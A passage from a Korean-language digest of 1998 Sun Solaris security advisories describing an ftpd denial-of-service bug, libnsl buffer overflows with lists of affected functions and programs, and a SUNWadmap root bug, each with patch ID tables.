SunOS 5.6_x86	105402-13
SunOS 5.5.1	103612-41
SunOS 5.5.1_x86	103613-41
SunOS 5.5	103187-38
SunOS 5.5_x86	103188-38
SunOS 5.4	101973-35
SunOS 5.4_x86	101974-35
SunOS 5.3	101318-91 (to be released in 12 weeks)

References

Sun Security Bulletin 170 번

Secure Networks Inc. advisory (SNI-27)

12.ftpd (1998/6/10) ; bug id #171

1. 해당 프로그램

ftpd

해당 시스템

SunOS 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86 and 5.3.

Description of Bugs

in.ftpd 는 FTP (File Transfer Protocol) server process 이다. in.ftpd 는 inetd 에서 ftp service 로 connection 이 만들어 질 때마다 호출된다. 이 in.ftpd 를 악용해서 ftp server 로 Denial of Service attack 을 할 수 있는 문제점이 보고 되었다.

4. 해결책 & 패치리스트

SunOS	Patch ID
SunOS 5.6	106301-01
SunOS 5.6_x86	106302-01
SunOS 5.5.1	103603-08
SunOS 5.5.1_x86	103604-08
SunOS 5.5	103577-08
SunOS 5.5_x86	103578-08
SunOS 5.4	101945-59 (to be released in 6 weeks)
SunOS 5.4_x86	101946-52 (to be released in 6 weeks)
SunOS 5.3	104938-02

5. References

Sun Security Bulletin 171 번

13. libnsl (1998/7/15) ; bug id #172

1. 해당 프로그램

libnsl

2. 해당 시스템

SunOS 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86 , 5.3.

3. Description of Bugs

네트웍 서비스 라이브러리인 libnsl 은 application 프로그램들이 network 서비스를 할 때 interface 가 되는 function 들을 제공한다. 이 라이브러리 내부 루틴에서 버퍼오버플로우를 일으킬 수 있고 이를 악용하여 root 권한을 얻어낼 수 있음이 발견되었다.

아래의 내용들은 RSI 어드바이저리 #5 에 근거를 두고 있다. 이 취약점들은 Matt Conover 에 의해 발견되었다.

취약한 Function 들 리스트

취약한 key function 들
extract_secret( )	데이터를 로칼 버퍼로 카피할 때 버퍼오버플로우 발생 가능
getkeys_nis( )	Key 값이 버퍼보다 큰 경우 버퍼오버플로우 발생 가능
getpublickey( )	getkeys_nis( ) 을 호출함
getsecretkey( )	getkeys_nis( ) 을 호출함

취약한 RPC function 들
authdes_seccreate( )	getpublickey( ) 을 호출함
rpc_broadcast_exp( )	Network 프로토콜 타잎을 지정하는 경우 버퍼오버플로우 발생 가능
rpc_broadcast( )	rpc_broadcast_exp( ) 을 호출함
clnt_create_timed( )	Network 프로토콜 타잎을 지정하는 경우 버퍼오버플로우 발생 가능
host2netname( )	hostname 을 지정할 때 버퍼오버플로우 발생가능
getnetname( )	host2netname( ) 을 호출함
clnt_create( )	clnt_create_timed( ) 을 호출함
rpc_call( )	Network 프로토콜 타잎을 지정하는 경우 버퍼오버플로우 발생 가능
authdes_pk_seccreate( )	getnetname( ) 을 호출함

취약한 NIS function 들
__nis_init_callback( )	getpublickey( ) 을 호출함
__nis_core_lookup( )	파라미터들을 로칼 버퍼로 카피할 때 버퍼오버플로우 발생 가능
nis_make_rpchandle( )	host2netname( ) 을 호출함
nis_dump_r( )	nis_make_rpchandle( ) 을 호출함
nis_dump( )	nis_dump_r( ) 을 호출함
__nis_auth2princ( )	machine name 을 지정할 때 버퍼오버플로우 발생가능
__nis_host2nis_server( )	hostname 을 지정할 때 버퍼오버플로우 발생가능
nis_name_of_r( )	파라미터들을 로칼 버퍼로 카피할 때 버퍼오버플로우 발생 가능
nis_old_data_r( )	파라미터들을 로칼 버퍼로 카피할 때 버퍼오버플로우 발생 가능
nis_list( )	__nis_core_lookup( ) 을 호출함
nis_add( )	nis_nameops( ) 을 호출함
nis_remove( )	nis_nameops( ) 을 호출함
nis_modify( )	nis_nameops( ) 을 호출함
nis_mkdir( )	nis_make_rpchandle( ) 을 호출함
nis_rmdir( )	nis_make_rpchandle( ) 을 호출함

잠재적으로 취약성을 가지고 있는 프로그램들

　취약한 RPC function 들을 호출하는 프로그램

nfs mount

nfs share

rpc.rexd

autofs

　취약한 key function 들을 호출하는 프로그램

chkey

keylogin

setkey

newkey

keyserv

libscheme

　취약한 NIS function 들을 호출하는 프로그램

rpc.nisd

rpc.nisdpasswdd

nisping

nisaddent

nisupdkeys

nisaddcred

sendmail

volcheck

vold

　취약한 YP function 들을 호출하는 프로그램

vacation

ypwhich

yppush

4. 해결책 & 패치리스트

SunOS	Patch ID
SunOS 5.6	105401-14
SunOS 5.6_x86	105402-14
SunOS 5.5.1	103612-43
SunOS 5.5.1_x86	103613-43
SunOS 5.5	103187-39
SunOS 5.5_x86	103188-39
SunOS 5.4	101973-36
SunOS 5.4_x86	101974-36
SunOS 5.3	101318-91 (8 주 이내에 배포될 예정)

5. References

14. SUNWadmap (1998/7/15) ; bug id #173

1. 해당 프로그램

SUNWadmap

2. 해당 시스템

SunOS 5.6 , 5.6_x86

3. Description of Bugs

SUNWadmap 은 시스템 관리 application 패키지인데, Solaris 2.6 Hardware:3/98 과 5/98 업데이트판에 포함된 SUNWadmap 패키지에 침입자가 root 권한을 얻을 수 있는 버그가 존재한다.

4. 해결책 & 패치리스트

SunOS	Patch ID
SunOS 5.6	105800-02 (patch 106125-05 가 필요)
SunOS 5.6_x86	105801-02 (patch 106126-05 가 필요)